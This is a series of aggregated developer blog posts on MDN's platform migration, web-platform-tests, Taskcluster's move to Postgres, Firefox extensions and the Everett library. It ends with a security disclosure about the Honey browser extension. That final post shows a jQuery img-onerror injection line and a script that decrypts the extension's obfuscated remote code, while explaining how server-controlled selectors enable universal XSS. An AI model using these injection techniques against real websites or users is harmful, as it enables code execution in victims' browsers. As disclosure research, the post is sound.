Posted over 4 years ago by Chris Mills
Update, November 3: The Yari beta phase is now open, so we’ve removed the beta signup form from this post. If you want to participate in beta testing, you can find the details on our Yari beta launch explainer.
The time has come for Kuma — the platform that powers MDN Web Docs — to evolve. For quite some time now, the MDN developer team has been planning a radical platform change, and we are ready to start sharing the details of it. The question on your lips might be “What does a Kuma evolve into? A KumaMaMa?”
For those of you not so into Pokémon, the question might instead be “How exactly is MDN changing, and how does it affect MDN users and contributors?”
For general users, the answer is easy — there will be very little change to how we serve the great content you use every day to learn and do your jobs.
For contributors, the answer is a bit more complex.
The changes in a nutshell
In short, we are updating the platform to move the content from a MySQL database to being hosted in a GitHub repository (codename: Project Yari).
The main advantages of this approach are:
Less developer maintenance burden: The existing (Kuma) platform is complex and hard to maintain. Adding new features is very difficult. The update will vastly simplify the platform code — we estimate that we can remove a significant chunk of the existing codebase, meaning easier maintenance and contributions.
Better contribution workflow: We will be using GitHub’s contribution tools and features, essentially moving MDN from a Wiki model to a pull request (PR) model. This is so much better for contribution, allowing for intelligent linting, mass edits, and inclusion of MDN docs in whatever workflows you want to add them to (you can edit MDN source files directly in your favorite code editor).
Better community building: At the moment, MDN content edits are published instantly, and then reverted if they are not suitable. This is really bad for community relations. With a PR model, we can review edits and provide feedback, actually having conversations with contributors, building relationships with them, and helping them learn.
Improved front-end architecture: The existing MDN platform has a number of front-end inconsistencies and accessibility issues, which we’ve wanted to tackle for some time. The move to a new, simplified platform gives us a perfect opportunity to fix such issues.
The exact form of the platform is yet to be finalized, and we want to involve you, the community, in helping to provide ideas and test the new contribution workflow! We will have a beta version of the new platform ready for testing on November 2, and the first release will happen on December 14.
Simplified back-end platform
We are replacing the current MDN Wiki platform with a JAMStack approach, which publishes the content managed in a GitHub repo. This has a number of advantages over the existing Wiki platform, and is something we’ve been considering for a number of years.
Before we discuss our new approach, let’s review the Wiki model so we can better understand the changes we’re making.
Current MDN Wiki platform
It’s important to note that both content contributors (writers) and content viewers (readers) are served via the same architecture. That architecture has to accommodate both use cases, even though more than 99% of our traffic comprises document page requests from readers. Currently, when a document page is requested, the latest version of the document is read from our MySQL database, rendered into its final HTML form, and returned to the user via the CDN.
That document page is stored and served from the CDN’s cache for the next 5 minutes, so subsequent requests — as long as they’re within that 5-minute window — will be served directly by the CDN. That caching period of 5 minutes is kept deliberately short, mainly due to the fact that we need to accommodate the needs of the writers. If we only had to accommodate the needs of the readers, we could significantly increase the caching period and serve our document pages more quickly, while at the same time reducing the workload on our backend servers.
You’ll also notice that because MDN is a Wiki platform, we’re responsible for managing all of the content, and tasks like storing document revisions, displaying the revision history of a document, displaying differences between revisions, and so on. Currently, the MDN development team maintains a large chunk of code devoted to just these kinds of tasks.
New MDN platform
With the new JAMStack approach, the writers are served separately from the readers. The writers manage the document content via a GitHub repository and pull request model, while the readers are served document pages more quickly and efficiently via pre-rendered document pages served from S3 via a CDN (which will have a much longer caching period). The document content from our GitHub repository will be rendered and deployed to S3 on a daily basis.
You’ll notice, from the diagram above, that even with this new approach, we still have a Kubernetes cluster with Django-based services relying on a relational database. The important thing to remember is that this part of the system is no longer involved with the document content. Its scope has been dramatically reduced, and it now exists solely to provide APIs related to user accounts (e.g. login) and search.
This separation of concerns has multiple benefits, the three most important of which are as follows:
First, the document pages are served to readers in the simplest, quickest, and most efficient way possible. That’s really important, because 99% of MDN’s traffic is for readers, and worldwide performance is fundamental to the user experience.
Second, because we’re using GitHub to manage our document content, we can take advantage of the world-class functionality that GitHub has to offer as a content management system, and we no longer have to support the large body of code related to our current Wiki platform. It can simply be deleted.
Third, and maybe less obvious, is that this new approach brings more power to the platform. We can, for example, perform automated linting and testing on each content pull request, which allows us to better control quality and security.
New contribution workflow
Because MDN content is soon to be contained in a GitHub repo, the contribution workflow will change significantly. You will no longer be able to click Edit on a page, make and save a change, and have it show up nearly immediately on the page. You’ll also no longer be able to do your edits in a WYSIWYG editor.
Instead, you’ll need to use git/GitHub tooling to make changes, submit pull requests, then wait for changes to be merged, the new build to be deployed, etc. For very simple changes such as fixing typos or adding new paragraphs, this may seem like a step back — Kuma is certainly convenient for such edits, and for non-developer contributors.
However, making a simple change is arguably no more complex with Yari. You can use the GitHub UI’s edit feature to directly edit a source file and then submit a PR, meaning that you don’t have to be a git genius to contribute simple fixes.
For more complex changes, you’ll need to use the git CLI tool, or a GUI tool like GitHub Desktop. Then again, git is such a ubiquitous tool in the web industry that it is safe to say that if you are interested in editing MDN, you will probably need to know git to some degree for your career or course anyway. You could use this as a good opportunity to learn git if you don’t know it already! On top of that, there is a file system structure to learn, and some new tools/commands to get used to, but nothing terribly complex.
Another possible challenge to mention is that you won’t have a WYSIWYG to instantly see what the page looks like as you add your content, and in addition you’ll be editing raw HTML, at least initially (we are talking about converting the content to markdown eventually, but that is a bit of a ways off). Again, this sounds like a step backwards, but we are providing a tool inside the repo so that you can locally build and preview the finished page to make sure it looks right before you submit your pull request.
Looking at the advantages now, consider that making MDN content available as a GitHub repo is a very powerful thing. We no longer have spam content going live on the site, which we then have to revert after the fact. You are also free to edit MDN content in whatever way suits you best — your favorite IDE or code editor — and you can add MDN documentation into your preferred toolchain (and write your own tools to improve your MDN editing experience). A lot of engineers have told us in the past that they’d be much happier to contribute to MDN documentation if they were able to submit pull requests, and not have to use a WYSIWYG!
We are also looking into a powerful toolset that will allow us to enhance the reviewing process, for example as part of a CI process — automatically detecting and closing spam PRs, and as mentioned earlier on, linting pages once they’ve been edited, and delivering feedback to editors.
Having MDN in a GitHub repo also offers much easier mass edits; blanket content changes have previously been very difficult.
Finally, the “time to live” should be acceptable — we are aiming to have a quick turnaround on the reviews, and the deployment process will be repeated every 24 hours. We think that your changes should be live on the site in 48 hours as a worst case scenario.
Better community building
Currently MDN is not a very lively place in terms of its community. We have a fairly active learning forum where people ask beginner coding questions and seek help with assessments, but there is not really an active place where MDN staff and volunteers get together regularly to discuss documentation needs and contributions.
Part of this is down to our contribution model. When you edit an MDN page, either your contribution is accepted and you don’t hear anything, or your contribution is reverted and you … don’t hear anything. You’ll only know either way by looking to see if your edit sticks, is counter-edited, or is reverted.
This doesn’t strike us as very friendly, and I think you’ll probably agree. When we move to a git PR model, the MDN community will be able to provide hands-on assistance in helping people to get their contributions right — offering assistance as we review their PRs (and offering automated help too, as mentioned previously) — and also thanking people for their help.
It’ll also be much easier for contributors to show how many contributions they’ve made, and we’ll be adding in-page links so that, if a problem is encountered, people can file an issue on a specific page or even go straight to the source on GitHub and fix it themselves.
In terms of finding a good place to chat about MDN content, you can join the discussion on the MDN Web Docs chat room on Matrix.
Improved front-end architecture
The old Kuma architecture has a number of front-end issues. Historically we have lacked a well-defined system that clearly describes the constraints we need to work within, and what our site features look like, and this has left us with a bloated, difficult-to-maintain front-end codebase. Working on our current HTML and CSS is like being on a roller coaster with no guard-rails.
To be clear, this is not the fault of any one person, or any specific period in the life of the MDN project. There are many little things that have been left to fester, multiply, and rot over time.
Among the most significant problems are:
Accessibility: There are a number of accessibility problems with the existing architecture that really should be sorted out, but were difficult to get a handle on because of Kuma’s complexity.
Component inconsistency: Kuma doesn’t use a proper design system — similar items are implemented in different ways across the site, so implementing features is more difficult than it needs to be.
When we started to move forward with the back-end platform rewrite, it felt like the perfect time to again propose the idea of a design system. After many conversations leading to an acceptable compromise being reached, our design system — MDN Fiori — was born.
Front-end developer Schalk Neethling and UX designer Mustafa Al-Qinneh took a whirlwind tour through the core of MDN’s reference docs to identify components and document all the inconsistencies we are dealing with. As part of this work, we also looked for areas where we can improve the user experience, and introduce consistency through making small changes to some core underlying aspects of the overall design.
This included a defined color palette, simple, clean typography based on a well-defined type scale, consistent spacing, improved support for mobile and tablet devices, and many other small tweaks. This was never meant to be a redesign of MDN, so we had to be careful not to change too much. Instead, we played to our existing strengths and made rogue styles and markup consistent with the overall project.
Besides the visual consistency and general user experience aspects, our underlying codebase needed some serious love and attention — we decided on a complete rethink. Early on in the process it became clear that we needed a base library that was small, nimble, and minimal. Something uniquely MDN, but that could be reused wherever the core aspects of the MDN brand were needed. For this purpose we created MDN-Minimalist, a small set of core atoms that power the base styling of MDN, in a progressively enhanced manner, taking advantage of the beautiful new layout systems we have access to on the web today.
Each component that is built into Yari is styled with MDN-Minimalist, and also has its own style sheet that lives right alongside it to apply further styles only when needed. This is an evolving process as we constantly rethink how to provide a great user experience while staying as close to the web platform as possible. The reason for this is twofold:
First, it means less code. It means less reinventing of the wheel. It means a faster, leaner, less bandwidth-hungry MDN for our end users.
Second, it helps address some of the accessibility issues we have begrudgingly been living with for some time, which are simply not acceptable on a modern web site. One of Mozilla’s accessibility experts, Marco Zehe, has given us a lot of input to help overcome these. We won’t fix everything in our first iteration, but our pledge to all of our users is that we will keep improving and we welcome your feedback on areas where we can improve further.
A wise person once said that the best way to ensure something is done right is to make doing the right thing the easy thing to do. As such, along with all of the work already mentioned, we are documenting our front-end codebase, design system, and pattern library in Storybook (see Storybook files inside the yari repo) with companion design work in Figma (see typography example) to ensure there is an easy, public reference for anyone who wishes to contribute to MDN from a code or design perspective. This in itself is a large project that will evolve over time. More communication about its evolution will follow.
The future of MDN localization
One important part of MDN’s content that we have talked about a lot during the planning phase is the localized content. As you probably already know, MDN offers facilities for translating the original English content and making the localizations available alongside it.
This is good in principle, but the current system has many flaws. When an English page is moved, the localizations all have to be moved separately, so pages and their localizations quite often go out of sync and get in a mess. And a bigger problem is that there is no easy way of signalling to all the localizers that the English version has changed.
General management is probably the most significant problem. You often get a wave of enthusiasm for a locale, and lots of translations done. But then after a number of months interest wanes, and no-one is left to keep the translations up to date. The localized content becomes outdated, which is often harmful to learning, becomes a maintenance time-suck, and as a result, is often considered worse than having no localizations at all.
Note that we are not saying this is true of all locales on MDN, and we are not trying to downplay the amount of work volunteers have put into creating localized content. For that, we are eternally grateful. But the fact remains that we can’t carry on like this.
We did a bunch of research, and talked to a lot of non-native-English-speaking web developers about what would be useful to them. Two interesting conclusions emerged:
We stand to experience a significant but manageable loss of users if we remove or reduce our localization support. 8 languages cover 90% of the accept-language headers received from MDN users (en, zh, es, ja, fr, ru, pt, de), while 14 languages cover 95% of the accept-language headers (en, zh, es, ja, fr, ru, pt, de, ko, zh-TW, pl, it, nl, tr). We estimate that we would lose at most 19% of our traffic if we dropped L10n entirely.
Machine translations are an acceptable solution in most cases, if not a perfect one. We looked at the quality of translations provided by automated solutions such as Google Translate and got some community members to compare these translations to manual translations. The machine translations were imperfect, and sometimes hard to understand, but many people commented that a non-perfect language that is up-to-date is better than a perfect language that is out-of-date. We appreciate that some languages (such as CJK languages) fare less well than others with automated translations.
So what did we decide? With the initial release of the new platform, we are planning to include all translations of all of the current documents, but in a frozen state. Translations will exist in their own mdn/translated-content repository, to which we will not accept any pull requests. The translations will be shown with a special header that says “This is an archived translation. No more edits are being accepted.” This is a temporary stage until we figure out the next step.
Note: In addition, the text of the UI components and header menu will be in English only, going forward. They will not be translated, at least not initially.
After the initial release, we want to work with you, the community, to figure out the best course of action to move forward with for translations. We would ideally rather not lose localized content on MDN, but we need to fix the technical problems of the past, manage it better, and ensure that the content stays up-to-date.
We will be planning the next phase of MDN localization with the following guiding principles:
We should never have outdated localized content on MDN.
Manually localizing all MDN content in a huge range of locales seems infeasible, so we should drop that approach.
Losing ~20% of traffic is something we should avoid, if possible.
We are making no promises about deliverables or time frames yet, but we have started to think along these lines:
Cut down the number of locales we are handling to the top 14 locales that give us 95% of our recorded accept-language headers.
Initially include non-editable Machine Learning-based automated translations of the “tier-1” MDN content pages (i.e. a set of the most important MDN content that excludes the vast long tail of articles that get no, or nearly no views). Ideally we’d like to use the existing manual translations to train the Machine Learning system, hopefully getting better results. This is likely to be the first thing we’ll work on in 2021.
Regularly update the automated translations as the English content changes, keeping them up-to-date.
Start to offer a system whereby we allow community members to improve the automated translations with manual edits. This would require the community to ensure that articles are kept up-to-date with the English versions as they are updated.
Acknowledgements
I’d like to thank my colleagues Schalk Neethling, Ryan Johnson, Peter Bengtsson, Rina Tambo Jensen, Hermina Condei, Melissa Thermidor, and anyone else I’ve forgotten who helped me polish this article with bits of content, feedback, reviews, edits, and more.
The post MDN Web Docs evolves! Lowdown on the upcoming new platform appeared first on Mozilla Hacks - the Web developer blog.
Posted over 4 years ago by Mike Taylor
I added a small feature to web-platform-tests that allows you to load a test automatically on the www subdomain by using a .www filename flag (here’s the original issue).
So like, if you ever need to load a page on a different subdomain to test some kind of origin-y or domain-y thing, you can just name your test something amazing like origin-y-test.www.html and it will open the test for you at www.web-platform.test (rather than web-platform.test, or similarly, however your system or server is configured).
Now you’ll never need to embed an <iframe> or call window.open() ever again (unless you actually need to do those things).
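As a rough sketch (not part of the actual feature), the body of such a test, saved as origin-y-test.www.html and loaded with the standard testharness.js helpers, might look something like this:
// Sketch only: a hypothetical test body for a file named origin-y-test.www.html,
// included alongside the usual /resources/testharness.js and
// /resources/testharnessreport.js scripts.
test(() => {
  // Because of the .www filename flag, the harness serves this page from
  // www.web-platform.test, so the hostname should start with "www.".
  assert_true(location.hostname.startsWith("www."),
              "test page is served from the www subdomain");
}, "the .www filename flag loads the test on the www subdomain");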
🎃
Posted over 4 years ago
This is a deep-dive into some of the implementation details of Taskcluster.
Taskcluster is a platform for building continuous integration, continuous deployment, and software-release processes.
It’s an open source project that began life at Mozilla, supporting the Firefox build, test, and release systems.
The Taskcluster “services” are a collection of microservices that handle distinct tasks: the queue coordinates tasks; the worker-manager creates and manages workers to execute tasks; the auth service authenticates API requests; and so on.
Azure Storage Tables to Postgres
Until April 2020, Taskcluster stored its data in Azure Storage tables, a simple NoSQL-style service similar to AWS’s DynamoDB.
Briefly, each Azure table is a list of JSON objects with a single primary key composed of a partition key and a row key.
Lookups by primary key are fast and parallelize well, but scans of an entire table are extremely slow and subject to API rate limits.
Taskcluster was carefully designed within these constraints, but that meant that some useful operations, such as listing tasks by their task queue ID, were simply not supported.
Switching to a fully-relational datastore would enable such operations, while easing deployment of the system for organizations that do not use Azure.
Always Be Migratin’
In April, we migrated the existing deployments of Taskcluster (at that time all within Mozilla) to Postgres.
This was a “forklift migration”, in the sense that we moved the data directly into Postgres with minimal modification.
Each Azure Storage table was imported into a single Postgres table of the same name, with a fixed structure:
create table queue_tasks_entities(
  partition_key text,                         -- Azure partition key
  row_key text,                               -- Azure row key
  value jsonb not null,                       -- the row's JSON object, as imported from Azure
  version integer not null,                   -- row-format version tracked by azure-entities
  etag uuid default public.gen_random_uuid()  -- used for optimistic concurrency (see below)
);
alter table queue_tasks_entities add primary key (partition_key, row_key);
The importer we used was specially tuned to accomplish this import in a reasonable amount of time (hours).
For each known deployment, we scheduled a downtime to perform this migration, after extensive performance testing on development copies.
We considered options to support a downtime-free migration.
For example, we could have built an adapter that would read from Postgres and Azure, but write to Postgres.
This adapter could support production use of the service while a background process copied data from Azure to Postgres.
This option would have been very complex, especially in supporting some of the atomicity and ordering guarantees that the Taskcluster API relies on.
Failures would likely lead to data corruption and a downtime much longer than the simpler, planned downtime.
So, we opted for the simpler, planned migration.
(we’ll revisit the idea of online migrations in part 3)
The database for Firefox CI occupied about 350GB.
The other deployments, such as the community deployment, were much smaller.
Database Interface
All access to Azure Storage tables had been via the azure-entities library, with a limited and very regular interface (hence the _entities suffix on the Postgres table name).
We wrote an implementation of the same interface, but with a Postgres backend, in taskcluster-lib-entities.
The result was that none of the code in the Taskcluster microservices changed.
Not changing code is a great way to avoid introducing new bugs!
It also limited the complexity of this change: we only had to deeply understand the semantics of azure-entities, and not the details of how the queue service handles tasks.
Stored Functions
As the taskcluster-lib-entities README indicates, access to each table is via five stored database functions:
_load - load a single row
_create - create a new row
_remove - remove a row
_modify - modify a row
_scan - return some or all rows in the table
Stored functions are functions defined in the database itself, which can be redefined within a transaction.
Part 2 will get into why we made this choice.
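As a rough illustration of how these five operations surface on the JavaScript side, here is a sketch with simplified names and signatures; the exact taskcluster-lib-entities API differs:
// Sketch only: illustrative entity-style calls, not the exact library API.
const task = await Task.load({ taskId });             // calls the table's _load function
await Task.create({ taskId, status: 'pending' });     // _create
await task.modify(t => { t.status = 'running'; });    // _modify (see below)
await task.remove();                                  // _remove
const someTasks = await Task.scan({}, { limit: 100 }); // _scan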
Optimistic Concurrency
The modify function is an interesting case.
Azure Storage has no notion of a “transaction”, so the azure-entities library uses an optimistic-concurrency approach to implement atomic updates to rows.
This uses the etag column, which changes to a new value on every update, to detect and retry concurrent modifications.
While Postgres can do much better, we replicated this behavior in taskcluster-lib-entities, again to limit the changes made and avoid introducing new bugs.
A modification looks like this in Javascript:
await task.modify(task => {
if (task.status !== 'running') {
task.status = 'running';
task.started = now();
}
});
For those not familiar with JS notation, this is calling the modify method on a task, passing a modifier function which, given a task, modifies that task.
The modify method calls the modifier and tries to write the updated row to the database, conditioned on the etag still having the value it did when the task was loaded.
If the etag does not match, modify re-loads the row to get the new etag, and tries again until it succeeds.
The effect is that updates to the row occur one-at-a-time.
This approach is “optimistic” in the sense that it assumes no conflicts, and does extra work (retrying the modification) only in the unusual case that a conflict occurs.
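Stripped of the library specifics, the retry loop behind modify can be sketched roughly as follows; load, store, and modifier here are assumed helpers for illustration, not the real taskcluster-lib-entities internals:
// Sketch only: an etag-based optimistic-concurrency retry loop.
async function modifyWithRetry(load, store, modifier) {
  while (true) {
    const row = await load();   // current row value plus its etag
    const copy = { ...row };
    modifier(copy);             // the modifier mutates the copy in place, as in the example above
    // store() is assumed to update the row only if its etag still matches
    // row.etag, returning false when a concurrent update won the race.
    if (await store(copy, row.etag)) {
      return copy;
    }
    // etag mismatch: loop around, re-load, and try again
  }
}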
What’s Next?
At this point, we had fork-lifted Azure tables into Postgres and no longer require an Azure account to run Taskcluster.
However, we hadn’t yet seen any of the benefits of a relational database:
data fields were still trapped in a JSON object (in fact, some kinds of data were hidden in base64-encoded blobs)
each table still only had a single primary key, and queries by any other field would still be prohibitively slow
joins between tables would also be prohibitively slow
Part 2 of this series of articles will describe how we addressed these issues.
Then part 3 will get into the details of performing large-scale database migrations without downtime.
Posted over 4 years ago by Jorge Villalobos
In addition to our brief update on extensions in Firefox 83, this post contains information about changes to the Firefox release calendar and a feature preview for Firefox 84.
Thanks to a contribution from Richa Sharma, the error message logged when tabs.sendMessage is passed an invalid tab ID is now much easier to understand. It had regressed to a generic message due to a previous refactoring.
End of Year Release Calendar
The end of 2020 is approaching (yay?), and as usual people will be taking time off and will be less available. To account for this, the Firefox Release Calendar has been updated to extend the Firefox 85 release cycle by 2 weeks. We will release Firefox 84 on 15 December and Firefox 85 on 26 January. The regular 4-week release cadence should resume after that.
Coming soon in Firefox 84: Manage Optional Permissions in Add-ons Manager
Starting with Firefox 84, currently available on the Nightly pre-release channel, users will be able to manage optional permissions of installed extensions from the Firefox Add-ons Manager (about:addons).
We recommend that extensions using optional permissions listen for the browser.permissions.onAdded and browser.permissions.onRemoved API events. This ensures the extension is aware of the user granting or revoking optional permissions.
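For instance, a background script could register listeners along these lines (a minimal sketch; the comments mark where extension-specific logic would go):
// Keep the extension's state in sync with permission changes made in about:addons.
browser.permissions.onAdded.addListener((permissions) => {
  console.log("Optional permissions granted:", permissions.permissions, permissions.origins);
  // Enable any features that depend on the newly granted permissions here.
});
browser.permissions.onRemoved.addListener((permissions) => {
  console.log("Optional permissions revoked:", permissions.permissions, permissions.origins);
  // Disable or clean up features that relied on the revoked permissions here.
});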
The post Extensions in Firefox 83 appeared first on Mozilla Add-ons Blog.
Posted over 4 years ago by Will Kahn-Greene
What is it?
Everett is a configuration library for Python apps.
Goals of Everett:
flexible configuration from multiple configured environments
easy testing with configuration
easy documentation of configuration for users
From that, Everett has the following features:
is composable and flexible
makes it easier to provide helpful error messages for users trying to configure your software
supports auto-documentation of configuration with a Sphinx autocomponent directive
has an API for testing configuration variations in your tests
can pull configuration from a variety of specified sources (environment, INI files, YAML files, dict, write-your-own)
supports parsing values (bool, int, lists of things, classes, write-your-own)
supports key namespaces
supports component architectures
works with whatever you're writing--command line tools, web sites, system daemons, etc.
v1.0.3 released!
This is a minor maintenance update that fixes a couple of small bugs, addresses a Sphinx deprecation issue, drops support for Python 3.4 and 3.5, and adds support for Python 3.8 and 3.9 (largely adding those environments to the test suite).
Why you should take a look at Everett
At Mozilla, I'm using Everett for a variety of projects: Mozilla symbols server, Mozilla crash ingestion pipeline, and some other tooling. We use it in a bunch of other places at Mozilla, too.
Everett makes it easy to:
deal with different configurations between local development and server environments
test different configuration values
document configuration options
First-class docs. First-class configuration error help. First-class testing.
This is why I created Everett.
If this sounds useful to you, take it for a spin. It's a drop-in replacement
for python-decouple and os.environ.get('CONFIGVAR', 'default_value') style
of configuration so it's easy to test out.
Enjoy!
Where to go for more
For more specifics on this release, see here:
https://everett.readthedocs.io/en/latest/history.html#october-28th-2020
Documentation and quickstart here:
https://everett.readthedocs.io/
Source code and issue tracker here:
https://github.com/willkg/everett
Posted over 4 years ago
Honey is a popular browser extension built by the PayPal subsidiary Honey Science LLC. It promises nothing less than preventing you from wasting money on your online purchases. Whenever possible, it will automatically apply promo codes to your shopping cart, thus saving you money without you lifting a finger. And it even runs a reward program that will give you some money back! Sounds great, so what's the catch?
With such offers, the price you pay is usually your privacy. With Honey, it’s also security. The browser extension is highly reliant on instructions it receives from its server. I found at least four ways for this server to run arbitrary code on any website you visit. So the extension can mutate into spyware or malware at any time, for all users or only for a subset of them – without leaving any traces of the attack like a malicious extension release.
Image credits: Honey, Glitch, Firkin, j4p4n
Contents
The trouble with shopping assistants
Unique user identifiers
Remote configure everything
The highly flexible promo code applying process
When selectors aren’t actually selectors
How about some obfuscation?
Taking over the extension
About that privacy commitment…
Why you should care
The trouble with shopping assistants
Please note that there are objective reasons why it's really hard to build a good shopping assistant. The main issue is the sheer number of online shops: Honey supports close to 50 thousand, yet I easily found a bunch of shops that were missing. Even shops based on the same engine are typically customized and might have subtle differences in their behavior. Not only that, they will also change without advance warning. Supporting this zoo is far from trivial.
Add to this the fact that with most of these shops there is very little money to be earned. A shopping assistant needs to work well with Amazon and Shopify. But supporting everything else has to come at close to no cost whatsoever.
The resulting design choices are the perfect recipe for a privacy nightmare:
As much server-side configuration as possible, to avoid releasing new extension versions unnecessarily
As much data extraction as possible, to avoid manual monitoring of shop changes
Bad code quality with many inconsistent approaches, because improving code is costly
I looked into Honey primarily because of its popularity: according to the product's website, it is used by more than 17 million users. Given the above, I didn't expect great privacy choices. And while I haven't seen anything indicating malice, the poor choices made still managed to exceed my expectations by far.
Unique user identifiers
By now you are probably used to reading statements like the following in companies' privacy statements:
None of the information that we collect from these events contains any personally identifiable information (PII) such as names or email addresses.
But of course a persistent semi-random user identifier doesn't count as "personally identifiable information." So Honey creates several of those and sends them with every request to its servers.
The exv value in the Cookie header, for example, is a combination of the extension version, a user ID (bound to the Honey account if any) and a device ID (a locally generated random value, stored persistently in the extension data). The same value is also sent with the payload of various requests.
If you are logged into your Honey account, there will also be x-honey-auth-at and x-honey-auth-rt headers. These are an access and a refresh token respectively. It’s not that these are required (the server will produce the same responses regardless) but they once again associate your requests with your Honey account.
So that’s where this Honey privacy statement is clearly wrong: while the data collected doesn’t contain your email address, Honey makes sure to associate it with your account among other things. And the account is tied to your email address. If you were careless enough to enter your name, there will be a name associated with the data as well.
Remote configure everything
Out of the box, the extension won't know what to do. Before it can do anything at all, it first needs to ask the server which domains it is supposed to be active on. The result is currently a huge list that includes some of the most popular domains like google.com, bing.com and microsoft.com.
Clearly, not all of google.com is an online shop. So when you visit one of the "supported" domains for the first time within a browsing session, the extension requests additional information listing the actual shops on that domain. The extension then knows to ignore all of google.com except for the shops listed in the response. It still doesn't know anything about the individual shops however, so when you visit Google Play for example there will be one more request fetching that shop's configuration.
The metadata part of that response is most interesting as it determines much of the extension's behavior on the respective website. For example, there are optional fields pns_siteSelSubId1 to pns_siteSelSubId3 that determine what information the extension sends back to the server later.
In these requests, the subid1 field and similar ones are empty because pns_siteSelSubId1 is missing in the store configuration. Were it present, Honey would use it as a CSS selector to find a page element, extract its text and send that text back to the server. Good if somebody wants to know what exactly people are looking at.
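As a rough, hypothetical sketch (the names and structure below are assumed, not taken from the extension's code), the mechanism amounts to something like this:
// Hypothetical sketch of the pns_siteSelSubId mechanism, not Honey's actual code.
// "storeConfig" stands in for the store configuration received from the server.
const selector = storeConfig.metadata.pns_siteSelSubId1; // server-controlled CSS selector
const subid1 = selector ? $(selector).text() : "";
// subid1 would then be included in the payload reported back to the server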
Mind you, I only found this functionality enabled on amazon.com and macys.com, yet the selectors provided appear to be outdated and do not match anything. So is this some outdated functionality that is no longer in use and that nobody bothered removing yet? Very likely. Yet it could jump to life any time to collect more detailed information about your browsing habits.
The highly flexible promo code applying process
As you can imagine, the process of applying promo codes can vary wildly between different shops. Yet Honey needs to do it somehow without bothering the user. So while store configuration normally tends to stick to CSS selectors, for this task it resorts to JavaScript code. The configuration for hostgator.com, for example, contains code under keys like pns_siteRemoveCodeAction and pns_siteSelCartCodeSubmit.
That JavaScript code will be injected into the web page, so it could do anything there: add more items to the cart, change the shipping address or steal your credit card data. Honey requires us to put a lot of trust in their web server. Isn't there a better way?
Turns out, Honey actually found one. Allow me to introduce a mechanism labeled internally as "DAC", for reasons I haven't been able to figure out.
The configuration's acorn field contains base64-encoded JSON data: the output of the acorn JavaScript parser, an Abstract Syntax Tree (AST) of some JavaScript code. When reassembled, it turns into this script:
let price = state.startPrice;
try {
$('#coupon-code').val(code);
$('#check-coupon').click();
setTimeout(3000);
price = $('#preview_total').text();
} catch (_) {
}
resolve({ price });
But Honey doesn't reassemble the script. Instead, it runs it via a JavaScript-based JavaScript interpreter. This library is explicitly meant to run untrusted code in a sandboxed environment. All one has to do is make sure that the script only gets access to safe functionality.
But you are wondering what this $() function is, aren’t you? It almost looks like jQuery, a library that I called out as a security hazard on multiple occasions. And indeed: Honey chose to expose full jQuery functionality to the sandboxed scripts, thus rendering the sandbox completely useless.
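To see why, here is a generic jQuery demonstration, not code observed in Honey, of what any sandboxed script with access to $() could do:
// Generic demonstration, not code observed in Honey: if the "selector" passed to
// $() starts with "<", jQuery parses it as HTML and creates the elements, and
// any inline event handlers run on the page, outside the sandbox.
$('<img src="x" onerror="console.log(\'arbitrary code running in the page\')">');
// A sandboxed script with access to $() can therefore escape the sandbox at will.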
Why did they even bother with this complicated approach? Beats me. I can only imagine that they had trouble with shops using Content Security Policy (CSP) in a way that prohibited execution of arbitrary scripts. So they decided to run the scripts outside the page's own script engine, where CSP couldn't stop them.
When selectors aren’t actually selectors
So if the Honey server turned malicious, it would have to enable Honey functionality on the target website and then trick the user into clicking the button that applies promo codes? It could even make that attack more likely to succeed: some of the CSS styling the button is conveniently served remotely, so the button could be made transparent and span the entire page – the user would be bound to click it.
No, that’s still too complicated. Those selectors in the store configuration, what do you think: how are these turned into actual elements? Are you saying document.querySelector()? No, guess again. Is anybody saying “jQuery”? Yes, of course it is using jQuery for extension code as well! And that means that every selector could be potentially booby-trapped.
In the hostgator.com store configuration discussed above, the pns_siteSelCartCodeBox field has the selector #coupon-code, [name="coupon"] as its value. What if the server replaces that selector with HTML code that displays a message instead? Exactly that happens: the message appears, several times in fact, because Honey evaluates this "selector" a number of times for each page. It does that for any page of a supported store, unconditionally. Remember that whether a site is a supported store is determined by the Honey server. So this is a very simple and reliable way for that server to leverage its privileged access to the Honey extension and run arbitrary code on any website (a universal XSS vulnerability).
How about some obfuscation?
Now we have something simple and reliable, but isn't it also too obvious? What if somebody monitors the extension's network requests? Won't they notice the odd JavaScript code?
That scenario is rather unlikely actually; just look at how long Avast has been spying on their users with barely anybody noticing. But Honey's developers are always up for a challenge. Their solution was aptly named "VIM" (no, they definitely don't mean the editor).
With the VIM code downloaded for a store, there is no point decoding the base64-encoded data: the result will be binary garbage. As it turns out, the data has been encrypted using AES, with the start of the string serving as the key. But even after decrypting you won't be any wiser: the resulting JSON data has all key names replaced by numeric indices, and the values are once again encrypted.
You need the following script to decrypt the data (requires CryptoJS):
const keys = [
"alternate", "argument", "arguments", "block", "body", "callee", "cases",
"computed", "consequent", "constructor", "declaration", "declarations",
"discriminant", "elements", "expression", "expressions", "finalizer",
"handler", "id", "init", "key", "kind", "label", "left", "method", "name",
"object", "operator", "param", "params", "prefix", "properties", "property",
"quasi", "right", "shorthand", "source", "specifiers", "superClass", "tag",
"test", "type", "update", "value"
];
function decryptValue(obj)
{
if (Array.isArray(obj))
return obj.map(decryptValue);
if (typeof obj != "object" || !obj)
return obj;
let result = {};
for (let key of Object.keys(obj))
{
let value = obj[key];
if (key.startsWith("_"))
key = keys[parseInt(key.substr(1), 10)];
if (typeof value == "string")
value = CryptoJS.AES.decrypt(value.slice(1), value[0] + "+" + key).toString(CryptoJS.enc.Utf8);
else
value = decryptValue(value);
result[key] = value;
}
return result;
}
var data = ""; // paste the encrypted data from the server response here
data = JSON.parse(CryptoJS.AES.decrypt(data.slice(10), data.slice(0, 10)).toString(CryptoJS.enc.Utf8));
console.log(decryptValue(data));
What you get is once again the Abstract Syntax Tree (AST) of some JavaScript code. The lengthy chunks of JavaScript code do things like categorizing the pages of a shop and determining what kind of logic should apply to them. And the sandboxing is once again ineffective, with the code being given access to jQuery, for example.
So here is a mechanism, providing the server with a simple way to run arbitrary JavaScript code on any website it likes, immediately after the page loads and with sufficient obfuscation that nobody will notice anything odd. Mission accomplished?
Taking over the extension
Almost. So far we were talking about running code in the context of websites. But wouldn't running code in the context of the extension provide more flexibility? There is a small complication: the Content Security Policy (CSP) mechanism disallows running arbitrary JavaScript code in the extension context. At least that's the case with the Firefox extension, due to the Mozilla Add-ons requirements; on Chrome, the extension simply relaxed its CSP protection.
But that's not really a problem, of course. As we've already established, running the code in your own JavaScript interpreter circumvents this protection. And so the Honey extension also has VIM code that runs in the context of the extension's background page.
